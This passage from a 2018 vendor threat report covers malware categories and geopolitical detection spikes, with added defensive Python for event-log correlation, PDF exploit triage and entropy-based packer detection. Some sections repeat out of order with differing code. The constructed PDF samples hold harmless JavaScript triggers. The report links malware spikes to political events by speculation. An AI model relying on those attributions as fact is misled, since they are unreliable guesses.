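            if c is not None and ev["ts"] - c["ts"] <= window:
                alerts.append({
                    "account": ev["target"],
                    "created_by": c["subject"],
                    "group": ev["group"],
                    "seconds_between": (ev["ts"] - c["ts"]).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_created_then_admin(parse_events(SAMPLE_LOG)):
        print(alert)
```

On the constructed log only `RemoteSvc` fires: `jdoe` was added to a non-administrative group, `alice` was an existing account, and `bob` was promoted a day after creation, outside the window. Widening the window trades fewer misses for more routine-admin noise, so pick it from the environment's own provisioning timing.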


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
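PDF exploit documents generally need two things in the file: something that runs automatically when the document opens, and an object carrying the code. A defender's first-pass triage therefore counts those object names. The following scanner is an added example written for this page, not Comodo's code and not a full PDF parser; both documents are constructed samples, and the watched-name lists are an assumption. It decodes the `#xx` hex escapes PDF allows in names, so that `/J#61vaScript` is counted as `/JavaScript` rather than slipping past a plain string match.

```python
"""Static triage of a PDF for the object names exploit documents rely on.

Added example written for this page; not Comodo's code and not a full
PDF parser. Both sample documents below are constructed."""
import re
from collections import Counter

# A PDF name is '/' followed by regular characters; whitespace and delimiters end it
NAME_RE = re.compile(rb"/[^\s/\[\]<>(){}%]+")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")

# Names that run something when the file is opened, and names that carry a payload
TRIGGER_NAMES = (b"/OpenAction", b"/AA")
PAYLOAD_NAMES = (b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile", b"/RichMedia")


def decode_name(token):
    """Resolve #xx escapes so /J#61vaScript compares equal to /JavaScript."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), token)


def count_names(pdf_bytes):
    """Count every watched name in the file, escapes resolved."""
    counts = Counter()
    for token in NAME_RE.findall(pdf_bytes):
        name = decode_name(token)
        if name in TRIGGER_NAMES or name in PAYLOAD_NAMES:
            counts[name.decode("ascii", "replace")] += 1
    return dict(counts)


def triage(pdf_bytes):
    """Return (counts, suspicious). 'suspicious' means the file both auto-runs
    something and carries a payload-type object, the pairing an exploit
    document needs; either alone also occurs in legitimate files."""
    counts = count_names(pdf_bytes)
    has_trigger = any(counts.get(n.decode()) for n in TRIGGER_NAMES)
    has_payload = any(counts.get(n.decode()) for n in PAYLOAD_NAMES)
    return counts, has_trigger and has_payload


# Constructed sample: catalog-level /OpenAction, a page-level /AA, and one
# JavaScript action whose name is hex-escaped. The script itself is harmless.
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 5 0 R >> >> endobj
4 0 obj << /S /JavaScript /JS (app.alert('constructed sample')) >> endobj
5 0 obj << /S /J#61vaScript /JS 6 0 R >> endobj
6 0 obj << /Length 12 >> stream
app.alert(1)
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed benign sample: same skeleton, no actions at all.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)):
        counts, flag = triage(doc)
        print(label, counts, "SUSPICIOUS" if flag else "ok")
```

This is a first filter, not a verdict: names inside compressed object streams (`/ObjStm`) or FlateDecode-encoded dictionaries are invisible to a byte scan, so a file that passes here still deserves a real parser or sandbox before it is trusted.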


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
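Compressed or encrypted code has a statistical fingerprint regardless of which packer produced it: its bytes are close to uniformly distributed, while a decompression stub, plain code or text is not. That is why entropy is the usual first heuristic for the packed-payload structure described above, and why a "modified" UPX that renames its sections does not escape it. The following is an added example written for this page, not Comodo's code and not part of UPX; the sample "file" is constructed (a text-like stub, a pseudo-random block standing in for the compressed payload, and zero padding), and the 1024-byte window and 7.0-bit threshold are assumptions to be tuned on real samples.

```python
"""Entropy heuristic for locating packed or encrypted regions in a file.

Added example written for this page; not Comodo's code and not part of UPX.
The sample built by build_sample() is a constructed stand-in for a packed
binary, not a real PE."""
import math
import random
from collections import Counter


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 (one repeated value) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(data, packed_threshold=7.0, empty_threshold=1.0):
    """Coarse label for one region of a file (thresholds are assumptions)."""
    h = shannon_entropy(data)
    if h < empty_threshold:
        return "padding/empty"
    if h >= packed_threshold:
        return "likely packed or encrypted"
    return "plain code/text"


def high_entropy_regions(data, window=1024, step=512, threshold=7.0):
    """Slide a window over `data` and return merged [start, end) ranges whose
    entropy reaches `threshold`. A packed executable typically shows a small
    low-entropy unpacking stub followed by one large high-entropy region."""
    regions = []
    last_full = len(data) - window
    for off in range(0, max(last_full, 0) + 1, step):
        if shannon_entropy(data[off:off + window]) >= threshold:
            if regions and off <= regions[-1][1]:
                regions[-1][1] = off + window   # overlapping hit: extend region
            else:
                regions.append([off, off + window])
    return [tuple(r) for r in regions]


def build_sample():
    """Constructed stand-in for a packed binary: 1 KiB text-like stub,
    4 KiB pseudo-random 'payload', 512 bytes of zero padding."""
    rng = random.Random(2018)                      # fixed seed: reproducible
    stub = (b"mov eax, ebx ; call sub_401000 ; ret\n" * 40)[:1024]
    payload = bytes(rng.getrandbits(8) for _ in range(4096))
    padding = b"\x00" * 512
    return stub + payload + padding


if __name__ == "__main__":
    sample = build_sample()
    for name, blob in (("stub", sample[:1024]),
                       ("payload", sample[1024:5120]),
                       ("padding", sample[5120:])):
        print(f"{name:8s} entropy={shannon_entropy(blob):.2f}  {classify(blob)}")
    print("high-entropy regions:", high_entropy_regions(sample))
```

On the constructed sample the scan reports a single region covering the payload and nothing else. Two caveats apply on real files: legitimate resources (images, fonts, signed blobs) are also high-entropy, so the heuristic is a reason to look closer rather than a verdict, and a packer that inserts low-entropy filler at intervals can break a single merged region into several, which is why the window and step should be varied rather than fixed once.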


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to “kill” or shut them down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information, but merely to have fun at the victim’s expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and “system optimizers”.

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let’s examine unique malware profiles that Comodo identified within specific “verticals”, or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical’s top malware type.

Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let’s examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizen are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarus society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.


7.10 Finland, Russia, USA

Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

NORTH AMERICA
Comodo Security Solutions, Inc.
1255 Broad Street, Clifton, NJ 07013, United States
Tel: +1 (888) 551 1531
Tel: +1 (888) 266 6361
Int: +1 (703) 581 6361
Fax: +1 (973) 777 4394
sales@comodo.com

EUROPE
Comodo Security Solutions, Inc.
Șoseaua Națională 31, Iași 700237, Romania
Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd.
Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India
Tel: +91 44 4562 2800
www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc.

Visit comodo.com

Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190

countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more

than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity


Global Threat Report Q2 2018 Edition

Page 45 of 73

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos. In 2012, the FBI arrested 10 people for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
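As an added example (not from the report), the detection logic a defender can run over Windows Security event log records to catch the account-creation behaviour attributed to Starter above. Event IDs 4720 (user account created) and 4732 (member added to a security-enabled local group) are real Windows events; the record layout, field names and sample values are constructed for this example.

```python
"""Correlate account creation with admin-group membership, as an added example.

Windows logs event 4720 when a user account is created and 4732 when a
member is added to a security-enabled local group. The report notes that
Starter creates an account and adds it to the administrators group as a
"Remote Service Account", so two things are flagged here: a 4720 whose
display name matches that label, and any 4720 followed by a 4732 into an
administrator group within a short window. Records are modelled as dicts
with constructed values; a real pipeline would fill them from the
EventData fields of the exported log.
"""
from datetime import datetime, timedelta

EVENT_ACCOUNT_CREATED = 4720
EVENT_LOCAL_GROUP_MEMBER_ADDED = 4732
ADMIN_GROUPS = {"administrators"}          # add localized group names as needed
SUSPECT_LABELS = ("remote service account",)

# Constructed sample log: one Starter-like sequence and one routine helpdesk action.
SAMPLE_EVENTS = [
    {"time": "2018-06-02T03:14:05", "id": 4720, "account": "svc_remote",
     "display_name": "Remote Service Account", "subject": "SYSTEM"},
    {"time": "2018-06-02T03:14:06", "id": 4732, "account": "svc_remote",
     "group": "Administrators", "subject": "SYSTEM"},
    {"time": "2018-06-02T09:00:00", "id": 4720, "account": "jdoe",
     "display_name": "John Doe", "subject": "helpdesk01"},
    {"time": "2018-06-03T11:30:00", "id": 4732, "account": "jdoe",
     "group": "Remote Desktop Users", "subject": "helpdesk01"},
]


def _when(event):
    return datetime.fromisoformat(event["time"])


def find_suspicious_accounts(events, window=timedelta(minutes=10)):
    """Return [(account, reason)] for accounts matching either indicator."""
    findings = []
    created_at = {}                                   # account -> creation time
    for ev in sorted(events, key=_when):
        acct = ev["account"].lower()
        if ev["id"] == EVENT_ACCOUNT_CREATED:
            created_at[acct] = _when(ev)
            label = ev.get("display_name", "").lower()
            if any(s in label for s in SUSPECT_LABELS):
                findings.append((ev["account"],
                                 f"created with display name '{ev['display_name']}'"))
        elif ev["id"] == EVENT_LOCAL_GROUP_MEMBER_ADDED:
            # Only a fresh account landing in an admin group is interesting here.
            if ev["group"].lower() not in ADMIN_GROUPS or acct not in created_at:
                continue
            if _when(ev) - created_at[acct] <= window:
                findings.append((ev["account"],
                                 f"created and added to {ev['group']} within {window}"))
    return findings


if __name__ == "__main__":
    for account, reason in find_suspicious_accounts(SAMPLE_EVENTS):
        print(f"{account}: {reason}")
```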


5.2.4 Exploits

Computer Exploits comprise software, data chunks, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware, and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
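As an added example (not from the report), a static triage check of the kind a defender can apply to PDF attachments before they reach a reader: it scores the object keys that exploit documents typically depend on. The sample documents and the weights are constructed for this example; the #xx name escapes and FlateDecode streams it handles are standard PDF features.

```python
"""Static triage of a PDF for the object types that exploit documents rely on.

Added example, not from the report. It scans the raw bytes (plus any
FlateDecode streams it can inflate) for risky keys such as /JavaScript,
/OpenAction and /Launch, resolving the #xx hex escapes PDF allows in
names so a key spelled /Java#53cript is still recognised. The sample
documents are constructed; a real scanner would also walk object
streams and other filters.
"""
import re
import zlib

RISKY_KEYS = {            # key -> weight in the triage score (constructed weights)
    "/JavaScript": 3, "/JS": 3, "/Launch": 3,
    "/OpenAction": 2, "/AA": 2, "/EmbeddedFile": 2,
    "/RichMedia": 1, "/XFA": 1,
}


def normalise_names(data: bytes) -> bytes:
    """Resolve #xx escapes inside PDF name tokens (e.g. /Java#53cript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Best-effort zlib inflation of every stream ... endstream body."""
    bodies = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass                       # not Flate-encoded, or damaged
    return b"\n".join(bodies)


def scan_pdf(data: bytes) -> dict:
    """Return {'score': int, 'hits': {key: count}} for the document."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF header")
    haystack = normalise_names(data + b"\n" + inflate_streams(data))
    hits, score = {}, 0
    for key, weight in RISKY_KEYS.items():
        # A name token ends at whitespace or a delimiter, so /JS must not
        # match the start of a longer name such as /JSX.
        pattern = re.escape(key.encode()) + rb"(?![A-Za-z0-9_])"
        count = len(re.findall(pattern, haystack))
        if count:
            hits[key] = count
            score += weight * count
    return {"score": score, "hits": hits}


# Constructed samples (not real-world documents).
BENIGN_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF")
SUSPICIOUS_PDF = (b"%PDF-1.4\n"
                  b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
                  b"3 0 obj << /S /Java#53cript /JS (app.alert('hi')) >> endobj\n"
                  b"trailer << /Root 1 0 R >>\n%%EOF")
COMPRESSED_PDF = (b"%PDF-1.4\n4 0 obj << /Filter /FlateDecode >>\nstream\n"
                  + zlib.compress(b"<< /S /JavaScript /JS (app.alert('x')) >>")
                  + b"\nendstream\nendobj\n%%EOF")

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF),
                       ("compressed", COMPRESSED_PDF)]:
        print(label, scan_pdf(doc))
```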


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools, and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
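As an added example (not from the report), two packer indicators a defender can compute from a PE file's section table: the stock UPX section names, and the per-section entropy that still gives a modified build away when those names have been changed. The minimal PE parser and the sample images are constructed for this example; the header offsets follow the PE/COFF format.

```python
"""Packer indicators for a PE file, as an added example.

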